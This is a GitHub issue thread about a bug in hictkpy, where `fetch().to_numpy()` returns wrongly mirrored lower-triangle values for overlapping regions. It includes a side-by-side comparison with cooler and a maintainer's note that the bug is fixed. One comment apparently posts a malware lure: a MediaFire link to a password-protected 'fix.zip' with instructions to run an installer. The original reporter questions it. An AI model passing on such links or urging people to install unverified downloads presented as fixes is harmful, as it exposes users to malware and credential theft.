### ISSUE TITLE
`htk.fetch().to_numpy()` gives incorrect result when two regions overlap

### ISSUE THREAD

**Issue by i-pletenev** [paulsengroup/hictkpy#72]
Good day! First of all, thank you for this great effort to speed up `Cooler`! 

Unfortunately, I encountered some inconsistency between output of `cooler.Cooler().matrix().fetch()` and `htk.fetch().to_numpy()`. When two queried intervals overlap, the result of `htk.fetch().to_numpy()`  is incorrect. Here is an example using the file from `test` directory:

```Python
In [1]: import cooler

In [2]: import hictkpy as htk

In [3]: htk.__version__ # same thing for version from github
Out[3]: '0.0.5'

In [4]: clr_path = "cooler_test_file.mcool"

In [5]: resolution = 100_000

In [6]: reg1, reg2 = 'chr4:400000-900000', 'chr4:500000-1000000'

In [7]: clr_out = cooler.Cooler(clr_path + f"::resolutions/{resolution}").matrix(balance=False).fetch(reg1, reg2)

In [8]: clr_out
Out[8]: 
array([[17198,  4629,  1226,  1714,  2070],
       [47095, 19774,  3241,  3109,  3198],
       [19774, 50906, 13699,  9756,  6494],
       [ 3241, 13699, 42901, 18752,  4336],
       [ 3109,  9756, 18752, 39638, 14784]], dtype=int32)

In [9]: htk_out = htk.File(clr_path, resolution).fetch(reg1, reg2, normalization='NONE').to_numpy()

In [10]: htk_out
Out[10]: 
array([[17198,  4629,  1226,  1714,  2070],
       [47095, 19774,  3241,  3109,  3198],
       [ 1226, 50906, 13699,  9756,  6494],
       [ 1714,  3109, 42901, 18752,  4336],
       [ 2070,  3198,  6494, 39638, 14784]], dtype=int32)

In [11]: clr_out == htk_out
Out[11]: 
array([[ True,  True,  True,  True,  True],
       [ True,  True,  True,  True,  True],
       [False,  True,  True,  True,  True],
       [False, False,  True,  True,  True],
       [False, False, False,  True,  True]])
```
If I'm not mistaken, `cooler` produces correct values in the lower triangle, but `hictkpy` does not. It seems that values from the lower triangle are mirrored incorrectly.

This issue persists in both `0.0.5` version and `0.0.6.dev50+g6eca918` version obtained directly from github via `pip install 'git+https://github.com/paulsengroup/hictkpy.git@main'`.

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by i-pletenev** [comment]
@pngjian Could you give some details about the link you sent? I'm a bit sceptical about following the external link and then installing something on my PC.

**Comment by robomics** [comment]
Fixed!
See https://github.com/paulsengroup/hictkpy/issues/73 for more details.
